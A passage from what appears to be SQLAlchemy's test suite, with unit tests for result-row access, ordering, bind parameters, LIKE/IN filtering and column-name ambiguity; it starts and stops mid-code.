select([concat]).order_by("thedata").execute().fetchall(),
[("test: ed",), ("test: fred",), ("test: jack",)]
)
concat = ("test: " + users.c.user_name).label('thedata')
eq_(
select([concat]).order_by(desc('thedata')).execute().fetchall(),
[("test: jack",), ("test: fred",), ("test: ed",)]
)
@testing.requires.order_by_label_with_expression
def test_order_by_label_compound(self):
users.insert().execute(
{'user_id': 7, 'user_name': 'jack'},
{'user_id': 8, 'user_name': 'ed'},
{'user_id': 9, 'user_name': 'fred'},
)
concat = ("test: " + users.c.user_name).label('thedata')
eq_(
select([concat]).order_by(literal_column('thedata') + "x").
execute().fetchall(),
[("test: ed",), ("test: fred",), ("test: jack",)]
)
def test_row_comparison(self):
users.insert().execute(user_id=7, user_name='jack')
rp = users.select().execute().first()
self.assert_(rp == rp)
self.assert_(not(rp != rp))
equal = (7, 'jack')
self.assert_(rp == equal)
self.assert_(equal == rp)
self.assert_(not (rp != equal))
self.assert_(not (equal != equal))
def endless():
while True:
yield 1
self.assert_(rp != endless())
self.assert_(endless() != rp)
# test that everything compares the same
# as it would against a tuple
import operator
for compare in [False, 8, endless(), 'xyz', (7, 'jack')]:
for op in [
operator.eq, operator.ne, operator.gt,
operator.lt, operator.ge, operator.le
]:
try:
control = op(equal, compare)
except TypeError:
# Py3K raises TypeError for some invalid comparisons
assert_raises(TypeError, op, rp, compare)
else:
eq_(control, op(rp, compare))
try:
control = op(compare, equal)
except TypeError:
# Py3K raises TypeError for some invalid comparisons
assert_raises(TypeError, op, compare, rp)
else:
eq_(control, op(compare, rp))
@testing.provide_metadata
def test_column_label_overlap_fallback(self):
content = Table(
'content', self.metadata,
Column('type', String(30)),
)
bar = Table(
'bar', self.metadata,
Column('content_type', String(30))
)
self.metadata.create_all(testing.db)
testing.db.execute(content.insert().values(type="t1"))
row = testing.db.execute(content.select(use_labels=True)).first()
assert content.c.type in row
assert bar.c.content_type not in row
assert sql.column('content_type') in row
row = testing.db.execute(
select([content.c.type.label("content_type")])).first()
assert content.c.type in row
assert bar.c.content_type not in row
assert sql.column('content_type') in row
row = testing.db.execute(select([func.now().label("content_type")])). \
first()
assert content.c.type not in row
assert bar.c.content_type not in row
assert sql.column('content_type') in row
def test_pickled_rows(self):
users.insert().execute(
{'user_id': 7, 'user_name': 'jack'},
{'user_id': 8, 'user_name': 'ed'},
{'user_id': 9, 'user_name': 'fred'},
)
for pickle in False, True:
for use_labels in False, True:
result = users.select(use_labels=use_labels).order_by(
users.c.user_id).execute().fetchall()
if pickle:
result = util.pickle.loads(util.pickle.dumps(result))
eq_(
result,
[(7, "jack"), (8, "ed"), (9, "fred")]
)
if use_labels:
eq_(result[0]['query_users_user_id'], 7)
eq_(
list(result[0].keys()),
["query_users_user_id", "query_users_user_name"])
else:
eq_(result[0]['user_id'], 7)
eq_(list(result[0].keys()), ["user_id", "user_name"])
eq_(result[0][0], 7)
eq_(result[0][users.c.user_id], 7)
eq_(result[0][users.c.user_name], 'jack')
if not pickle or use_labels:
assert_raises(
exc.NoSuchColumnError,
lambda: result[0][addresses.c.user_id])
else:
# test with a different table. name resolution is
# causing 'user_id' to match when use_labels wasn't used.
eq_(result[0][addresses.c.user_id], 7)
assert_raises(
exc.NoSuchColumnError, lambda: result[0]['fake key'])
assert_raises(
exc.NoSuchColumnError,
lambda: result[0][addresses.c.address_id])
def test_column_error_printing(self):
row = testing.db.execute(select([1])).first()
class unprintable(object):
def __str__(self):
raise ValueError("nope")
msg = r"Could not locate column in row for column '%s'"
for accessor, repl in [
("x", "x"),
(Column("q", Integer), "q"),
(Column("q", Integer) + 12, r"q \+ :q_1"),
(unprintable(), "unprintable element.*"),
]:
assert_raises_message(
exc.NoSuchColumnError,
msg % repl,
lambda: row[accessor]
)
@testing.requires.boolean_col_expressions
def test_or_and_as_columns(self):
true, false = literal(True), literal(False)
eq_(testing.db.execute(select([and_(true, false)])).scalar(), False)
eq_(testing.db.execute(select([and_(true, true)])).scalar(), True)
eq_(testing.db.execute(select([or_(true, false)])).scalar(), True)
eq_(testing.db.execute(select([or_(false, false)])).scalar(), False)
eq_(
testing.db.execute(select([not_(or_(false, false))])).scalar(),
True)
row = testing.db.execute(
select(
[or_(false, false).label("x"),
and_(true, false).label("y")])).first()
assert row.x == False # noqa
assert row.y == False # noqa
row = testing.db.execute(
select(
[or_(true, false).label("x"),
and_(true, false).label("y")])).first()
assert row.x == True # noqa
assert row.y == False # noqa
def test_fetchmany(self):
users.insert().execute(user_id=7, user_name='jack')
users.insert().execute(user_id=8, user_name='ed')
users.insert().execute(user_id=9, user_name='fred')
r = users.select().execute()
l = []
for row in r.fetchmany(size=2):
l.append(row)
self.assert_(len(l) == 2, "fetchmany(size=2) got %s rows" % len(l))
def test_like_ops(self):
users.insert().execute(
{'user_id': 1, 'user_name': 'apples'},
{'user_id': 2, 'user_name': 'oranges'},
{'user_id': 3, 'user_name': 'bananas'},
{'user_id': 4, 'user_name': 'legumes'},
{'user_id': 5, 'user_name': 'hi % there'},
)
for expr, result in (
(select([users.c.user_id]).
where(users.c.user_name.startswith('apple')), [(1,)]),
(select([users.c.user_id]).
where(users.c.user_name.contains('i % t')), [(5,)]),
(select([users.c.user_id]).
where(users.c.user_name.endswith('anas')), [(3,)]),
(select([users.c.user_id]).
where(users.c.user_name.contains('i % t', escape='&')),
[(5,)]),
):
eq_(expr.execute().fetchall(), result)
@testing.requires.mod_operator_as_percent_sign
@testing.emits_warning('.*now automatically escapes.*')
def test_percents_in_text(self):
for expr, result in (
(text("select 6 % 10"), 6),
(text("select 17 % 10"), 7),
(text("select '%'"), '%'),
(text("select '%%'"), '%%'),
(text("select '%%%'"), '%%%'),
(text("select 'hello % world'"), "hello % world")
):
eq_(testing.db.scalar(expr), result)
def test_ilike(self):
users.insert().execute(
{'user_id': 1, 'user_name': 'one'},
{'user_id': 2, 'user_name': 'TwO'},
{'user_id': 3, 'user_name': 'ONE'},
{'user_id': 4, 'user_name': 'OnE'},
)
eq_(
select([users.c.user_id]).where(users.c.user_name.ilike('one')).
execute().fetchall(), [(1, ), (3, ), (4, )])
eq_(
select([users.c.user_id]).where(users.c.user_name.ilike('TWO')).
execute().fetchall(), [(2, )])
if testing.against('postgresql'):
eq_(
select([users.c.user_id]).
where(users.c.user_name.like('one')).execute().fetchall(),
[(1, )])
eq_(
select([users.c.user_id]).
where(users.c.user_name.like('TWO')).execute().fetchall(), [])
def test_compiled_execute(self):
users.insert().execute(user_id=7, user_name='jack')
s = select([users], users.c.user_id == bindparam('id')).compile()
c = testing.db.connect()
assert c.execute(s, id=7).fetchall()[0]['user_id'] == 7
def test_compiled_insert_execute(self):
users.insert().compile().execute(user_id=7, user_name='jack')
s = select([users], users.c.user_id == bindparam('id')).compile()
c = testing.db.connect()
assert c.execute(s, id=7).fetchall()[0]['user_id'] == 7
def test_repeated_bindparams(self):
"""Tests that a BindParam can be used more than once.
This should be run for DB-APIs with both positional and named
paramstyles.
"""
users.insert().execute(user_id=7, user_name='jack')
users.insert().execute(user_id=8, user_name='fred')
u = bindparam('userid')
s = users.select(and_(users.c.user_name == u, users.c.user_name == u))
r = s.execute(userid='fred').fetchall()
assert len(r) == 1
def test_bindparam_detection(self):
dialect = default.DefaultDialect(paramstyle='qmark')
prep = lambda q: str(sql.text(q).compile(dialect=dialect))
def a_eq(got, wanted):
if got != wanted:
print("Wanted %s" % wanted)
print("Received %s" % got)
self.assert_(got == wanted, got)
a_eq(prep('select foo'), 'select foo')
a_eq(prep("time='12:30:00'"), "time='12:30:00'")
a_eq(prep("time='12:30:00'"), "time='12:30:00'")
a_eq(prep(":this:that"), ":this:that")
a_eq(prep(":this :that"), "? ?")
a_eq(prep("(:this),(:that :other)"), "(?),(? ?)")
a_eq(prep("(:this),(:that:other)"), "(?),(:that:other)")
a_eq(prep("(:this),(:that,:other)"), "(?),(?,?)")
a_eq(prep("(:that_:other)"), "(:that_:other)")
a_eq(prep("(:that_ :other)"), "(? ?)")
a_eq(prep("(:that_other)"), "(?)")
a_eq(prep("(:that$other)"), "(?)")
a_eq(prep("(:that$:other)"), "(:that$:other)")
a_eq(prep(".:that$ :other."), ".? ?.")
a_eq(prep(r'select \foo'), r'select \foo')
a_eq(prep(r"time='12\:30:00'"), r"time='12\:30:00'")
a_eq(prep(":this \:that"), "? :that")
a_eq(prep(r"(\:that$other)"), "(:that$other)")
a_eq(prep(r".\:that$ :other."), ".:that$ ?.")
@testing.requires.standalone_binds
def test_select_from_bindparam(self):
"""Test result row processing when selecting from a plain bind
param."""
class MyInteger(TypeDecorator):
impl = Integer
def process_bind_param(self, value, dialect):
return int(value[4:])
def process_result_value(self, value, dialect):
return "INT_%d" % value
eq_(
testing.db.scalar(select([cast("INT_5", type_=MyInteger)])),
"INT_5"
)
eq_(
testing.db.scalar(
select([cast("INT_5", type_=MyInteger).label('foo')])),
"INT_5"
)
def test_order_by(self):
"""Exercises ORDER BY clause generation.
Tests simple, compound, aliased and DESC clauses.
"""
users.insert().execute(user_id=1, user_name='c')
users.insert().execute(user_id=2, user_name='b')
users.insert().execute(user_id=3, user_name='a')
def a_eq(executable, wanted):
got = list(executable.execute())
eq_(got, wanted)
for labels in False, True:
a_eq(users.select(order_by=[users.c.user_id],
use_labels=labels),
[(1, 'c'), (2, 'b'), (3, 'a')])
a_eq(users.select(order_by=[users.c.user_name, users.c.user_id],
use_labels=labels),
[(3, 'a'), (2, 'b'), (1, 'c')])
a_eq(select([users.c.user_id.label('foo')],
use_labels=labels,
order_by=[users.c.user_id]),
[(1,), (2,), (3,)])
a_eq(select([users.c.user_id.label('foo'), users.c.user_name],
use_labels=labels,
order_by=[users.c.user_name, users.c.user_id]),
[(3, 'a'), (2, 'b'), (1, 'c')])
a_eq(users.select(distinct=True,
use_labels=labels,
order_by=[users.c.user_id]),
[(1, 'c'), (2, 'b'), (3, 'a')])
a_eq(select([users.c.user_id.label('foo')],
distinct=True,
use_labels=labels,
order_by=[users.c.user_id]),
[(1,), (2,), (3,)])
a_eq(select([users.c.user_id.label('a'),
users.c.user_id.label('b'),
users.c.user_name],
use_labels=labels,
order_by=[users.c.user_id]),
[(1, 1, 'c'), (2, 2, 'b'), (3, 3, 'a')])
a_eq(users.select(distinct=True,
use_labels=labels,
order_by=[desc(users.c.user_id)]),
[(3, 'a'), (2, 'b'), (1, 'c')])
a_eq(select([users.c.user_id.label('foo')],
distinct=True,
use_labels=labels,
order_by=[users.c.user_id.desc()]),
[(3,), (2,), (1,)])
@testing.requires.nullsordering
def test_order_by_nulls(self):
"""Exercises ORDER BY clause generation.
Tests simple, compound, aliased and DESC clauses.
"""
users.insert().execute(user_id=1)
users.insert().execute(user_id=2, user_name='b')
users.insert().execute(user_id=3, user_name='a')
def a_eq(executable, wanted):
got = list(executable.execute())
eq_(got, wanted)
for labels in False, True:
a_eq(users.select(order_by=[users.c.user_name.nullsfirst()],
use_labels=labels),
[(1, None), (3, 'a'), (2, 'b')])
a_eq(users.select(order_by=[users.c.user_name.nullslast()],
use_labels=labels),
[(3, 'a'), (2, 'b'), (1, None)])
a_eq(users.select(order_by=[asc(users.c.user_name).nullsfirst()],
use_labels=labels),
[(1, None), (3, 'a'), (2, 'b')])
a_eq(users.select(order_by=[asc(users.c.user_name).nullslast()],
use_labels=labels),
[(3, 'a'), (2, 'b'), (1, None)])
a_eq(users.select(order_by=[users.c.user_name.desc().nullsfirst()],
use_labels=labels),
[(1, None), (2, 'b'), (3, 'a')])
a_eq(
users.select(
order_by=[users.c.user_name.desc().nullslast()],
use_labels=labels),
[(2, 'b'), (3, 'a'), (1, None)])
a_eq(
users.select(
order_by=[desc(users.c.user_name).nullsfirst()],
use_labels=labels),
[(1, None), (2, 'b'), (3, 'a')])
a_eq(users.select(order_by=[desc(users.c.user_name).nullslast()],
use_labels=labels),
[(2, 'b'), (3, 'a'), (1, None)])
a_eq(
users.select(
order_by=[users.c.user_name.nullsfirst(), users.c.user_id],
use_labels=labels),
[(1, None), (3, 'a'), (2, 'b')])
a_eq(
users.select(
order_by=[users.c.user_name.nullslast(), users.c.user_id],
use_labels=labels),
[(3, 'a'), (2, 'b'), (1, None)])
def test_column_slices(self):
users.insert().execute(user_id=1, user_name='john')
users.insert().execute(user_id=2, user_name='jack')
addresses.insert().execute(
address_id=1, user_id=2, address='foo@bar.com')
r = text(
"select * from query_addresses", bind=testing.db).execute().first()
self.assert_(r[0:1] == (1,))
self.assert_(r[1:] == (2, 'foo@bar.com'))
self.assert_(r[:-1] == (1, 2))
def test_column_accessor_basic_compiled(self):
users.insert().execute(
dict(user_id=1, user_name='john'),
dict(user_id=2, user_name='jack')
)
r = users.select(users.c.user_id == 2).execute().first()
self.assert_(r.user_id == r['user_id'] == r[users.c.user_id] == 2)
self.assert_(
r.user_name == r['user_name'] == r[users.c.user_name] == 'jack')
def test_column_accessor_basic_text(self):
users.insert().execute(
dict(user_id=1, user_name='john'),
dict(user_id=2, user_name='jack')
)
r = testing.db.execute(
text("select * from query_users where user_id=2")).first()
self.assert_(r.user_id == r['user_id'] == r[users.c.user_id] == 2)
self.assert_(
r.user_name == r['user_name'] == r[users.c.user_name] == 'jack')
def test_column_accessor_textual_select(self):
users.insert().execute(
dict(user_id=1, user_name='john'),
dict(user_id=2, user_name='jack')
)
# this will create column() objects inside
# the select(), these need to match on name anyway
r = testing.db.execute(
select([
column('user_id'), column('user_name')
]).select_from(table('query_users')).
where(text('user_id=2'))
).first()
self.assert_(r.user_id == r['user_id'] == r[users.c.user_id] == 2)
self.assert_(
r.user_name == r['user_name'] == r[users.c.user_name] == 'jack')
def test_column_accessor_dotted_union(self):
users.insert().execute(
dict(user_id=1, user_name='john'),
)
# test a little sqlite weirdness - with the UNION,
# cols come back as "query_users.user_id" in cursor.description
r = testing.db.execute(
text(
"select query_users.user_id, query_users.user_name "
"from query_users "
"UNION select query_users.user_id, "
"query_users.user_name from query_users"
)
).first()
eq_(r['user_id'], 1)
eq_(r['user_name'], "john")
eq_(list(r.keys()), ["user_id", "user_name"])
@testing.only_on("sqlite", "sqlite specific feature")
def test_column_accessor_sqlite_raw(self):
users.insert().execute(
dict(user_id=1, user_name='john'),
)
r = text(
"select query_users.user_id, query_users.user_name "
"from query_users "
"UNION select query_users.user_id, "
"query_users.user_name from query_users",
bind=testing.db).execution_options(sqlite_raw_colnames=True). \
execute().first()
assert 'user_id' not in r
assert 'user_name' not in r
eq_(r['query_users.user_id'], 1)
eq_(r['query_users.user_name'], "john")
eq_(list(r.keys()), ["query_users.user_id", "query_users.user_name"])
@testing.only_on("sqlite", "sqlite specific feature")
def test_column_accessor_sqlite_translated(self):
users.insert().execute(
dict(user_id=1, user_name='john'),
)
r = text(
"select query_users.user_id, query_users.user_name "
"from query_users "
"UNION select query_users.user_id, "
"query_users.user_name from query_users",
bind=testing.db).execute().first()
eq_(r['user_id'], 1)
eq_(r['user_name'], "john")
eq_(r['query_users.user_id'], 1)
eq_(r['query_users.user_name'], "john")
eq_(list(r.keys()), ["user_id", "user_name"])
def test_column_accessor_labels_w_dots(self):
users.insert().execute(
dict(user_id=1, user_name='john'),
)
# test using literal tablename.colname
r = text(
'select query_users.user_id AS "query_users.user_id", '
'query_users.user_name AS "query_users.user_name" '
'from query_users', bind=testing.db).\
execution_options(sqlite_raw_colnames=True).execute().first()
eq_(r['query_users.user_id'], 1)
eq_(r['query_users.user_name'], "john")
assert "user_name" not in r
eq_(list(r.keys()), ["query_users.user_id", "query_users.user_name"])
def test_column_accessor_unary(self):
users.insert().execute(
dict(user_id=1, user_name='john'),
)
# unary expressions
r = select([users.c.user_name.distinct()]).order_by(
users.c.user_name).execute().first()
eq_(r[users.c.user_name], 'john')
eq_(r.user_name, 'john')
def test_column_accessor_err(self):
r = testing.db.execute(select([1])).first()
assert_raises_message(
AttributeError,
"Could not locate column in row for column 'foo'",
getattr, r, "foo"
)
assert_raises_message(
KeyError,
"Could not locate column in row for column 'foo'",
lambda: r['foo']
)
def test_graceful_fetch_on_non_rows(self):
"""test that calling fetchone() etc. on a result that doesn't
return rows fails gracefully.
"""
# these proxies don't work with no cursor.description present.
# so they don't apply to this test at the moment.
# result.FullyBufferedResultProxy,
# result.BufferedRowResultProxy,
# result.BufferedColumnResultProxy
conn = testing.db.connect()
for meth in [
lambda r: r.fetchone(),
lambda r: r.fetchall(),
lambda r: r.first(),
lambda r: r.scalar(),
lambda r: r.fetchmany(),
lambda r: r._getter('user'),
lambda r: r._has_key('user'),
]:
trans = conn.begin()
result = conn.execute(users.insert(), user_id=1)
assert_raises_message(
exc.ResourceClosedError,
"This result object does not return rows. "
"It has been closed automatically.",
meth, result,
)
trans.rollback()
@testing.requires.empty_inserts
@testing.requires.returning
def test_no_inserted_pk_on_returning(self):
result = testing.db.execute(users.insert().returning(
users.c.user_id, users.c.user_name))
assert_raises_message(
exc.InvalidRequestError,
r"Can't call inserted_primary_key when returning\(\) is used.",
getattr, result, 'inserted_primary_key'
)
def test_fetchone_til_end(self):
result = testing.db.execute("select * from query_users")
eq_(result.fetchone(), None)
eq_(result.fetchone(), None)
eq_(result.fetchone(), None)
result.close()
assert_raises_message(
exc.ResourceClosedError,
"This result object is closed.",
result.fetchone
)
def test_row_case_sensitive(self):
row = testing.db.execute(
select([
literal_column("1").label("case_insensitive"),
literal_column("2").label("CaseSensitive")
])
).first()
eq_(list(row.keys()), ["case_insensitive", "CaseSensitive"])
in_("case_insensitive", row._keymap)
in_("CaseSensitive", row._keymap)
not_in_("casesensitive", row._keymap)
eq_(row["case_insensitive"], 1)
eq_(row["CaseSensitive"], 2)
assert_raises(
KeyError,
lambda: row["Case_insensitive"]
)
assert_raises(
KeyError,
lambda: row["casesensitive"]
)
def test_row_case_sensitive_unoptimized(self):
ins_db = engines.testing_engine(options={"case_sensitive": True})
row = ins_db.execute(
select([
literal_column("1").label("case_insensitive"),
literal_column("2").label("CaseSensitive"),
text("3 AS screw_up_the_cols")
])
).first()
eq_(
list(row.keys()),
["case_insensitive", "CaseSensitive", "screw_up_the_cols"])
in_("case_insensitive", row._keymap)
in_("CaseSensitive", row._keymap)
not_in_("casesensitive", row._keymap)
eq_(row["case_insensitive"], 1)
eq_(row["CaseSensitive"], 2)
eq_(row["screw_up_the_cols"], 3)
assert_raises(KeyError, lambda: row["Case_insensitive"])
assert_raises(KeyError, lambda: row["casesensitive"])
assert_raises(KeyError, lambda: row["screw_UP_the_cols"])
def test_row_case_insensitive(self):
ins_db = engines.testing_engine(options={"case_sensitive": False})
row = ins_db.execute(
select([
literal_column("1").label("case_insensitive"),
literal_column("2").label("CaseSensitive")
])
).first()
eq_(list(row.keys()), ["case_insensitive", "CaseSensitive"])
in_("case_insensitive", row._keymap)
in_("CaseSensitive", row._keymap)
in_("casesensitive", row._keymap)
eq_(row["case_insensitive"], 1)
eq_(row["CaseSensitive"], 2)
eq_(row["Case_insensitive"], 1)
eq_(row["casesensitive"], 2)
def test_row_case_insensitive_unoptimized(self):
ins_db = engines.testing_engine(options={"case_sensitive": False})
row = ins_db.execute(
select([
literal_column("1").label("case_insensitive"),
literal_column("2").label("CaseSensitive"),
text("3 AS screw_up_the_cols")
])
).first()
eq_(
list(row.keys()),
["case_insensitive", "CaseSensitive", "screw_up_the_cols"])
in_("case_insensitive", row._keymap)
in_("CaseSensitive", row._keymap)
in_("casesensitive", row._keymap)
eq_(row["case_insensitive"], 1)
eq_(row["CaseSensitive"], 2)
eq_(row["screw_up_the_cols"], 3)
eq_(row["Case_insensitive"], 1)
eq_(row["casesensitive"], 2)
eq_(row["screw_UP_the_cols"], 3)
def test_row_as_args(self):
users.insert().execute(user_id=1, user_name='john')
r = users.select(users.c.user_id == 1).execute().first()
users.delete().execute()
users.insert().execute(r)
eq_(users.select().execute().fetchall(), [(1, 'john')])
def test_result_as_args(self):
users.insert().execute([
dict(user_id=1, user_name='john'),
dict(user_id=2, user_name='ed')])
r = users.select().execute()
users2.insert().execute(list(r))
eq_(
users2.select().order_by(users2.c.user_id).execute().fetchall(),
[(1, 'john'), (2, 'ed')]
)
users2.delete().execute()
r = users.select().execute()
users2.insert().execute(*list(r))
eq_(
users2.select().order_by(users2.c.user_id).execute().fetchall(),
[(1, 'john'), (2, 'ed')]
)
@testing.requires.duplicate_names_in_cursor_description
def test_ambiguous_column(self):
users.insert().execute(user_id=1, user_name='john')
result = users.outerjoin(addresses).select().execute()
r = result.first()
assert_raises_message(
exc.InvalidRequestError,
"Ambiguous column name",
lambda: r['user_id']
)
assert_raises_message(
exc.InvalidRequestError,
"Ambiguous column name",
lambda: r[users.c.user_id]
)
assert_raises_message(
exc.InvalidRequestError,
"Ambiguous column name",
lambda: r[addresses.c.user_id]
)
# try to trick it - fake_table isn't in the result!
# we get the correct error
fake_table = Table('fake', MetaData(), Column('user_id', Integer))
assert_raises_message(
exc.InvalidRequestError,
"Could not locate column in row for column 'fake.user_id'",
lambda: r[fake_table.c.user_id]
)
r = util.pickle.loads(util.pickle.dumps(r))
assert_raises_message(
exc.InvalidRequestError,
"Ambiguous column name",
lambda: r['user_id']
)
result = users.outerjoin(addresses).select().execute()
result = _result.BufferedColumnResultProxy(result.context)
r = result.first()
assert isinstance(r, _result.BufferedColumnRow)
assert_raises_message(
exc.InvalidRequestError,
"Ambiguous column name",
lambda: r['user_id']
)
@testing.requires.duplicate_names_in_cursor_description
def test_ambiguous_column_by_col(self):
users.insert().execute(user_id=1, user_name='john')
ua = users.alias()
u2 = users.alias()
result = select([users.c.user_id, ua.c.user_id]).execute()
row = result.first()
assert_raises_message(
exc.InvalidRequestError,
"Ambiguous column name",
lambda: row[users.c.user_id]
)
assert_raises_message(
exc.InvalidRequestError,
"Ambiguous column name",
lambda: row[ua.c.user_id]
)
# Unfortunately, this fails -
# we'd like
# "Could not locate column in row"
# to be raised here, but the check for
# "common column" in _compare_name_for_result()
# has other requirements to be more liberal.
# Ultimately the
# expression system would need a way to determine
# if given two columns in a "proxy" relationship, if they
# refer to a different parent table
assert_raises_message(
exc.InvalidRequestError,
"Ambiguous column name",
lambda: row[u2.c.user_id]
)
@testing.requires.duplicate_names_in_cursor_description
def test_ambiguous_column_contains(self):
# ticket 2702. in 0.7 we'd get True, False.
# in 0.8, both columns are present so it's True;
# but when they're fetched you'll get the ambiguous error.
users.insert().execute(user_id=1, user_name='john')
result = select([users.c.user_id, addresses.c.user_id]).\
select_from(users.outerjoin(addresses)).execute()
row = result.first()
eq_(
set([users.c.user_id in row, addresses.c.user_id in row]),
set([True])
)
def test_ambiguous_column_by_col_plus_label(self):
users.insert().execute(user_id=1, user_name='john')
result = select(
[users.c.user_id,
type_coerce(users.c.user_id, Integer).label('foo')]).execute()
row = result.first()
eq_(
row[users.c.user_id], 1
)
eq_(
row[1], 1
)
def test_fetch_partial_result_map(self):
users.insert().execute(user_id=7, user_name='ed')
t = text("select * from query_users").columns(
user_name=String()
)
eq_(
testing.db.execute(t).fetchall(), [(7, 'ed')]
)
def test_fetch_unordered_result_map(self):
users.insert().execute(user_id=7, user_name='ed')
class Goofy1(TypeDecorator):
impl = String
def process_result_value(self, value, dialect):
return value + "a"
class Goofy2(TypeDecorator):
impl = String
def process_result_value(self, value, dialect):
return value + "b"
class Goofy3(TypeDecorator):
impl = String
def process_result_value(self, value, dialect):
return value + "c"
t = text(
"select user_name as a, user_name as b, "
"user_name as c from query_users").columns(
a=Goofy1(), b=Goofy2(), c=Goofy3()
)
eq_(
testing.db.execute(t).fetchall(), [
('eda', 'edb', 'edc')
]
)
@testing.requires.subqueries
def test_column_label_targeting(self):
users.insert().execute(user_id=7, user_name='ed')
for s in (
users.select().alias('foo'),
users.select().alias(users.name),
):
row = s.select(use_labels=True).execute().first()
assert row[s.c.user_id] == 7
assert row[s.c.user_name] == 'ed'
def test_keys(self):
users.insert().execute(user_id=1, user_name='foo')
result = users.select().execute()
eq_(
result.keys(),
['user_id', 'user_name']
)
row = result.first()
eq_(
row.keys(),
['user_id', 'user_name']
)
def test_keys_anon_labels(self):
"""test [ticket:3483]"""
users.insert().execute(user_id=1, user_name='foo')
result = testing.db.execute(
select([
users.c.user_id,
users.c.user_name.label(None),
func.count(literal_column('1'))]).
group_by(users.c.user_id, users.c.user_name)
)
eq_(
result.keys(),
['user_id', 'user_name_1', 'count_1']
)
row = result.first()
eq_(
row.keys(),
['user_id', 'user_name_1', 'count_1']
)
def test_items(self):
users.insert().execute(user_id=1, user_name='foo')
r = users.select().execute().first()
eq_(
[(x[0].lower(), x[1]) for x in list(r.items())],
[('user_id', 1), ('user_name', 'foo')])
def test_len(self):
users.insert().execute(user_id=1, user_name='foo')
r = users.select().execute().first()
eq_(len(r), 2)
r = testing.db.execute('select user_name, user_id from query_users'). \
first()
eq_(len(r), 2)
r = testing.db.execute('select user_name from query_users').first()
eq_(len(r), 1)
def test_sorting_in_python(self):
users.insert().execute(
dict(user_id=1, user_name='foo'),
dict(user_id=2, user_name='bar'),
dict(user_id=3, user_name='def'),
)
rows = users.select().order_by(users.c.user_name).execute().fetchall()
eq_(rows, [(2, 'bar'), (3, 'def'), (1, 'foo')])
eq_(sorted(rows), [(1, 'foo'), (2, 'bar'), (3, 'def')])
def test_column_order_with_simple_query(self):
# should return values in column definition order
users.insert().execute(user_id=1, user_name='foo')
r = users.select(users.c.user_id == 1).execute().first()
eq_(r[0], 1)
eq_(r[1], 'foo')
eq_([x.lower() for x in list(r.keys())], ['user_id', 'user_name'])
eq_(list(r.values()), [1, 'foo'])
def test_column_order_with_text_query(self):
# should return values in query order
users.insert().execute(user_id=1, user_name='foo')
r = testing.db.execute('select user_name, user_id from query_users'). \
first()
eq_(r[0], 'foo')
eq_(r[1], 1)
eq_([x.lower() for x in list(r.keys())], ['user_name', 'user_id'])
eq_(list(r.values()), ['foo', 1])
@testing.crashes('oracle', 'FIXME: unknown, verify not fails_on()')
@testing.crashes('firebird', 'An identifier must begin with a letter')
def test_column_accessor_shadow(self):
meta = MetaData(testing.db)
shadowed = Table(
'test_shadowed', meta,
Column('shadow_id', INT, primary_key=True),
Column('shadow_name', VARCHAR(20)),
Column('parent', VARCHAR(20)),
Column('row', VARCHAR(40)),
Column('_parent', VARCHAR(20)),
Column('_row', VARCHAR(20)),
)
shadowed.create(checkfirst=True)
try:
shadowed.insert().execute(
shadow_id=1, shadow_name='The Shadow', parent='The Light',
row='Without light there is no shadow',
_parent='Hidden parent', _row='Hidden row')
r = shadowed.select(shadowed.c.shadow_id == 1).execute().first()
self.assert_(
r.shadow_id == r['shadow_id'] == r[shadowed.c.shadow_id] == 1)
self.assert_(
r.shadow_name == r['shadow_name'] ==
r[shadowed.c.shadow_name] == 'The Shadow')
self.assert_(
r.parent == r['parent'] == r[shadowed.c.parent] == 'The Light')
self.assert_(
r.row == r['row'] == r[shadowed.c.row] ==
'Without light there is no shadow')
self.assert_(r['_parent'] == 'Hidden parent')
self.assert_(r['_row'] == 'Hidden row')
finally:
shadowed.drop(checkfirst=True)
@testing.emits_warning('.*empty sequence.*')
def test_in_filtering(self):
"""test the behavior of the in_() function."""
users.insert().execute(user_id=7, user_name='jack')
users.insert().execute(user_id=8, user_name='fred')
users.insert().execute(user_id=9, user_name=None)
s = users.select(users.c.user_name.in_([]))
r = s.execute().fetchall()
# No username is in empty set
assert len(r) == 0
s = users.select(not_(users.c.user_name.in_([])))
r = s.execute().fetchall()
# All usernames with a value are outside an empty set
assert len(r) == 2
s = users.select(users.c.user_name.in_(['jack', 'fred']))
r = s.execute().fetchall()
assert len(r) == 2
s = users.select(not_(users.c.user_name.in_(['jack', 'fred'])))
r = s.execute().fetchall()
# Null values are not outside any set
assert len(r) == 0
@testing.emits_warning('.*empty sequence.*')
@testing.fails_on('firebird', "uses sql-92 rules")
@testing.fails_on('sybase', "uses sql-92 rules")
@testing.fails_if(
lambda: testing.against('mssql+pyodbc') and not
testing.db.dialect.freetds, "uses sql-92 rules")
def test_bind_in(self):
"""test calling IN against a bind parameter.
this isn't allowed on several platforms since we
generate ? = ?.
"""
users.insert().execute(user_id=7, user_name='jack')
users.insert().execute(user_id=8, user_name='fred')
users.insert().execute(user_id=9, user_name=None)
u = bindparam('search_key')
s = users.select(not_(u.in_([])))
r = s.execute(search_key='john').fetchall()
assert len(r) == 3
r = s.execute(search_key=None).fetchall()
assert len(r) == 0
@testing.emits_warning('.*empty sequence.*')
def test_literal_in(self):
"""similar to test_bind_in but use a bind with a value."""
users.insert().execute(user_id=7, user_name='jack')
users.insert().execute(user_id=8, user_name='fred')
users.insert().execute(user_id=9, user_name=None)
s = users.select(not_(literal("john").in_([])))
r = s.execute().fetchall()
assert len(r) == 3
@testing.emits_warning('.*empty sequence.*')
@testing.requires.boolean_col_expressions
def test_in_filtering_advanced(self):
"""test the behavior of the in_() function when
comparing against an empty collection, specifically
that a proper boolean value is generated.
"""
users.insert().execute(user_id=7, user_name='jack')
users.insert().execute(user_id=8, user_name='fred')
users.insert().execute(user_id=9, user_name=None)
s = users.select(users.c.user_name.in_([]) == True) # noqa
r = s.execute().fetchall()
assert len(r) == 0
s = users.select(users.c.user_name.in_([]) == False) # noqa
r = s.execute().fetchall()
assert len(r) == 2
s = users.select(users.c.user_name.in_([]) == None) # noqa
r = s.execute().fetchall()
assert len(r) == 1
class RequiredBindTest(fixtures.TablesTest):
run_create_tables = None
run_deletes = None
@classmethod
def define_tables(cls, metadata):
Table(
'foo', metadata,
Column('id', Integer, primary_key=True),
Column('data', String(50)),
Column('x', Integer)
)
def _assert_raises(self, stmt, params):
assert_raises_message(
exc.StatementError,
"A value is required for bind parameter 'x'",
testing.db.execute, stmt, **params)
assert_raises_message(
exc.StatementError,
"A value is required for bind parameter 'x'",
testing.db.execute, stmt, params)
def test_insert(self):
stmt = self.tables.foo.insert().values(
